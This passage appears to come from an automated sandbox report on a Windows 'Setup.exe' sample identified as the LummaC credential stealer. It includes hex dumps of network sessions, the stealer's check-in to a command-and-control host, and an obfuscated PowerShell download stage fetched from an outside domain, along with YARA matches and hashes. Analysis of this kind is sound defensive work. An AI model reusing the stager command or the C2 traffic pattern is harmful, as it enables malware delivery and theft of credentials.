                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 60 75 f1 78 fc 13 54 68 87 d1 f1 98 b3 07 cf d1 17 0b bc b9 d9 63 f1 f3 c4 fa 68 97 4f d5 a1 4a bf 15 5f f4 6f b7 dd c7 75 03 58 5e a9 58 1b 78 b2 6d 15 1e 44 1c 66 5a 74 ab bc 4e cb 91 d8 14 93 9e 0e 29 d9 c2 6e ed 4d 19 b1 d8 9b 79 03 5f d6 60 22 33 01 cd 0f df 63 04 2e ba ca 87 ea 3b b7 d6 18 7b 62 44 ce 54 21 70 5e 2a 39 66 51 bc 35 e4 71 ea d8 6c 72 b5 c3 01 af 89 3e b5 c2 f4 02 d1 19 32 d2 7c 92 ef 7b 91 af 60 5f 8c 97 ba 4e f6 2e 65 75 8c 2a e0 85 44 45 99 6b f3 a9 85 d8 7e ff 4c 17 9b 49 81 c3 3a cd de be 5b fb 84 92 13 f6 e6 e9 70 f9 f4 12 21 23 4f 50 7c 68 64 07 c8 5c 38 c7 6c 60 1c ba ec 11 6b 8a 65 4d 7d 2c f8 54 d9 05 b9 a5 84 09 20 47 d8 11 bf e2 9f 10 69 04 ec 62 2e cf d4 c0 34 50 a3 12 36 39 3d 93 d3 8c 03 fb d5 da ed e1 c7 60 46 b1 fa 3f
                                                                                                                                                    Data Ascii: `uxThchOJ_ouX^XxmDfZtN)nMy_`"3c.;{bDT!p^*9fQ5qlr>2|{`_N.eu*DEk~LI:[p!#OP|hd\8l`keM},T Gib.4P69=`F?
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: d5 21 f5 ea 5e fa 8a d6 3b 84 95 d5 cb 7a cd 56 a6 1c 4d 72 e7 1e 15 e3 bd c2 87 0f a7 8d 21 9a 82 6d f6 99 4b 9f 2e ff 9b ed 90 bf a3 74 a5 c5 f0 59 ff dd 2a e3 d2 b9 ae fe bf af dc 2d fd 56 fb cf ab 3b 65 fb 4a 97 26 75 77 13 b8 bd ad 7f 57 71 ff 0c ef 21 6c 2c a5 b5 62 17 5f 29 83 9e 34 81 41 0a 0c 8b 08 98 54 6d 5e 17 05 69 0c b0 58 37 fe fb 10 c8 46 c1 4c ed 4c 2d 9c 05 20 64 43 28 04 42 1c ac 8b 43 39 af 07 d4 7e 9d 46 f2 42 29 38 b9 65 f6 c1 1e 03 04 2f 5c 14 3f bc 9f 90 b5 79 b1 3f fd a3 c6 f7 9d 22 a6 e8 70 18 7e d6 74 79 b9 bb bb f2 cf c2 55 d1 d4 30 b6 61 8e d9 87 18 96 b7 f7 86 fb 8b 47 10 29 c3 8b 7e 08 cc 5a 7b 0b 03 11 41 6c 8b e4 76 73 44 de f2 7a c9 a3 e6 db 97 45 35 f1 bc 14 db 7f 74 e9 e1 05 4f 7c db 3f f0 aa 3c d4 25 07 cb 43 77 4a 41
                                                                                                                                                    Data Ascii: !^;zVMr!mK.tY*-V;eJ&uwWq!l,b_)4ATm^iX7FLL- dC(BC9~FB)8e/\?y?"p~tyU0aG)~Z{AlvsDzE5tO|?<%CwJA
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: e4 f0 7e a3 db 80 e9 c8 20 90 56 54 bc f1 77 42 53 b7 18 f1 d2 ce 7b 20 7a 86 95 3a 3c f8 8e db 86 d2 9a 0f 4a f6 95 a8 9c 44 3e 5a 58 0b c9 38 5a e5 cf 4e 06 71 43 8c 30 23 56 41 fc e6 24 3f 18 e1 5b 25 dd 99 38 ba d1 97 91 f3 9f 6b f9 5d 46 70 31 eb e6 5d 83 b9 88 79 a5 3b dc 1c c1 c1 82 2f bb d3 7e 98 dc b7 db f0 5e 2c 6d 4b 53 4a 69 0d ad a9 70 b9 74 69 73 93 cd e2 dc 8f 37 e3 e8 33 8e ce 2d 5b 04 4e 48 c1 bd 16 12 dd 80 1a 23 f1 bf e0 31 1b 5c ce 7c 4c 60 59 8e 1c 89 e4 cc 96 4f b8 ba 0c ce 94 2f 77 af 70 90 8a 8a 21 65 6c 16 4a 0b 4b 9b 4c 79 ea 5f b2 a0 84 5b d3 14 88 c1 58 f2 91 f8 2c 4b 9b 08 92 84 ac 5f 84 73 03 48 bd 8a ad 1d 16 15 ee bf 17 14 5a 2b 29 47 08 89 45 df 18 71 04 19 cd 0d ce 39 60 33 34 02 ed ba 56 0b f3 be 64 5c c2 e2 e3 df 3f 16
                                                                                                                                                    Data Ascii: ~ VTwBS{ z:<JD>ZX8ZNqC0#VA$?[%8k]Fp1]y;/~^,mKSJiptis73-[NH#1\|L`YO/wp!elJKLy_[X,K_sHZ+)GEq9`34Vd\?
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 77 40 a9 77 b5 59 d7 df 2c c8 c3 af 87 2a 41 d9 2d cd a3 b4 a1 f3 50 0e 0d 09 5a c4 e6 ff 64 14 92 cb 50 41 17 48 6e 24 58 e5 e4 ef 99 e3 d2 d4 8f 89 3a a3 ab 17 dd 12 83 30 5d 41 5f 6b 98 60 65 f7 8c 4d bd 7d db ba e3 a9 5f 7f ea 6a ff de 16 64 97 bf c0 23 8a 8e bc 99 10 f2 6e 04 e5 75 69 74 d2 f2 8d 30 38 09 ed d5 9a 36 fa ac 3a 45 28 60 e1 5b 06 65 66 61 17 a6 c6 89 7c 13 b5 0b f5 6d 95 26 47 58 f6 a7 5e 03 5e 3f 12 f6 47 f0 73 0c d0 cd 85 96 51 0c 4e 59 1e da 85 2f 3f 41 cd 63 63 20 9f 4a 64 93 a2 ab ee a2 ed e8 d9 46 00 87 95 da 46 8a ed 4e d9 c5 53 6d 15 1c 2d c1 1a 60 a1 5f eb 2f 5e b9 ec a7 1d 5d 77 7b 88 0c cb 37 40 18 3c 5e 48 f1 f2 5b 15 e5 7b 0d f6 ba 33 bb d6 5e a8 0a 3d 36 d6 b9 1f 95 7e 81 75 04 a9 3a ab 81 4f 5d b7 cd db 78 e6 87 b7 e9 e6
                                                                                                                                                    Data Ascii: w@wY,*A-PZdPAHn$X:0]A_k`eM}_jd#nuit086:E(`[efa|m&GX^^?GsQNY/?Acc JdFFNSm-`_/^]w{7@<^H[{3^=6~u:O]x
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 7a f1 48 bf 7f 12 47 81 52 9a ab dc 98 e0 61 98 c3 df cc 67 95 e5 e8 ab b0 9a c3 48 50 6b 7f 5d d3 1e 3a 70 95 95 af ca 77 88 69 65 9f 1d b4 72 1e d7 3b 9d a2 0e 55 7d 23 97 40 96 95 32 98 d9 3a 63 68 a3 7a 8a 8c 4c 73 68 a3 a2 46 79 ae 99 30 a7 d5 4d 3b ff ec b7 be 24 54 9b 44 71 9a 8c a0 94 61 5e 89 38 e4 5d 26 d7 86 c9 42 5b 64 3e 55 0a 01 11 bb a2 40 c2 51 16 67 dd 7f 8c c8 ee 8b 69 0f 2d c5 35 d7 05 e4 bf 62 a0 73 76 29 96 ff 3b 4e ca fe a8 b4 f6 4d 8e f6 6d f9 f4 00 5b 44 39 82 41 9e ff 75 11 57 98 6c c5 ac f1 ee 47 a9 ee e9 0f 29 92 ee d3 9d 5a 66 39 d4 65 45 da d7 be 53 29 27 b0 7e 64 a6 94 16 9d 27 36 7d 2b ef 56 0e 2b f4 d3 96 ec 7f 27 cc 9c 98 df 0e 48 4e b1 a1 b8 af 16 a7 c2 07 fe f5 32 d8 b3 fc a1 6e f6 c5 6c e4 7b e9 46 af f0 97 8b d5 7a 33
                                                                                                                                                    Data Ascii: zHGRagHPk]:pwier;U}#@2:chzLshFy0M;$TDqa^8]&B[d>U@Qgi-5bsv);NMm[D9AuWlG)Zf9eES)'~d'6}+V+'HN2nl{Fz3
2025-01-05 16:54:28 UTC | 1137 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:28 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=fcmi3fbv3m3vh05jtc2kt7a87v; expires=Thu, 01 May 2025 10:41:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=82D7ummWPT03%2BOA6FSHGgEG01uZOoaRsVMvk2RLrvg%2BdmMuD0ThPZ97yZWUr%2BYyGPO0ellpa2bfpW1Qggs%2FAcZtA34uu6mkl38rKVGdKuXR2KNFMshPPOH3iHwXTbenhzOQ2CeU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd844ed342ea-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1611&rtt_var=617&sent=202&recv=602&lost=0&retrans=0&sent_bytes=2845&recv_bytes=589553&delivery_rate=1754807&cwnd=143&unsent_bytes=0&cid=9854348a67d846ea&ts=1619&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49757 | 104.21.90.109 | 443 | 6860 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 16:54:29 UTC | 267 | OUT | POST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 113
                                                                                                                                                    Host: sloppymisskr.click
2025-01-05 16:54:29 UTC | 113 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 44 35 31 35 42 38 42 38 43 45 46 37 44 36 35 45 33 41 39 45 45 32 44 31 36 30 32 30 36 31 36 30
                                                                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=D515B8B8CEF7D65E3A9EE2D160206160
2025-01-05 16:54:30 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:29 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=lugct5nnc3tnmkktr9rip6t6oc; expires=Thu, 01 May 2025 10:41:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rArOFE%2Fm1EQ1iMcKXcXe%2B9Ne9ZW3fD6OEypvKh1KgH%2BJAEqqq%2Befuh7EzO6vTeUJ4RD91RVMmwoLR770PLFtLf1qxZ06VjGQwn29t16tJ0fNQQtGfmZUt%2Frzqq7rbCWeaBNkQTU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd935a0643da-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2174&min_rtt=2160&rtt_var=838&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1016&delivery_rate=1284645&cwnd=203&unsent_bytes=0&cid=bf9e524326390ef8&ts=462&x=0"
2025-01-05 16:54:30 UTC | 218 | IN | Data Raw: 64 34 0d 0a 4b 31 4c 43 77 39 32 35 35 62 66 34 4a 30 42 6e 75 47 52 6b 6c 50 54 37 30 54 64 73 4b 37 77 32 43 73 61 69 75 55 69 41 39 66 56 77 4b 65 43 32 2f 34 50 48 33 34 78 54 4d 42 53 43 4f 45 76 49 32 35 69 30 55 42 6b 46 7a 31 35 6c 74 76 36 57 63 4c 58 43 77 52 6c 6b 38 50 66 70 6a 37 6d 59 69 45 39 75 45 38 41 51 52 72 6a 57 6e 61 55 56 56 68 6d 51 46 47 2f 6b 6d 49 67 31 72 49 37 58 58 6e 44 34 34 62 58 4e 6b 63 65 4c 48 52 78 49 35 45 73 50 2b 4a 32 4c 70 30 49 42 51 73 39 44 59 2b 6a 52 30 53 66 77 71 64 70 43 50 4c 61 63 76 74 57 56 36 49 74 50 49 55 6e 4d 48 42 43 32 32 4e 6d 33 51 30 34 52 6a 42 6f 6f 6f 34 43 44 65 50 32 6f 0d 0a
                                                                                                                                                    Data Ascii: d4K1LCw9255bf4J0BnuGRklPT70TdsK7w2CsaiuUiA9fVwKeC2/4PH34xTMBSCOEvI25i0UBkFz15ltv6WcLXCwRlk8Pfpj7mYiE9uE8AQRrjWnaUVVhmQFG/kmIg1rI7XXnD44bXNkceLHRxI5EsP+J2Lp0IBQs9DY+jR0SfwqdpCPLacvtWV6ItPIUnMHBC22Nm3Q04RjBooo4CDeP2o
2025-01-05 16:54:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | 6860 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 16:54:30 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Host: cegu.shop
2025-01-05 16:54:31 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Server: nginx/1.26.2
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:30 GMT
                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                    Content-Length: 329
                                                                                                                                                    Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    ETag: "676c9e2a-149"
                                                                                                                                                    Accept-Ranges: bytes
2025-01-05 16:54:31 UTC | 329 | IN | Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                    Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.



Target ID: 0
Start time: 11:54:01
Start date: 05/01/2025
Path: C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Setup.exe"
Imagebase: 0x400000
File size: 76'573'072 bytes
MD5 hash: 2F84C8A115EB4FA477054B3915D6D156
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1892472910.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000003.1892306082.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Offset: 03561000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_3_3561000_Setup.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7d5467ae5c896c0221578ad023627d8236c7dd3bb092056234490bd001ca9636
                                                                                                                                                      • Instruction ID: 04b107f74874af4ea350a4ab117fac499f072b100111b710dc69817d1728a3a1
                                                                                                                                                      • Opcode Fuzzy Hash: 7d5467ae5c896c0221578ad023627d8236c7dd3bb092056234490bd001ca9636
                                                                                                                                                      • Instruction Fuzzy Hash: C0C1865254E7C11FD31387745868691BFB0AF13118F0E86EBC4C9CF8E3D259A98AD362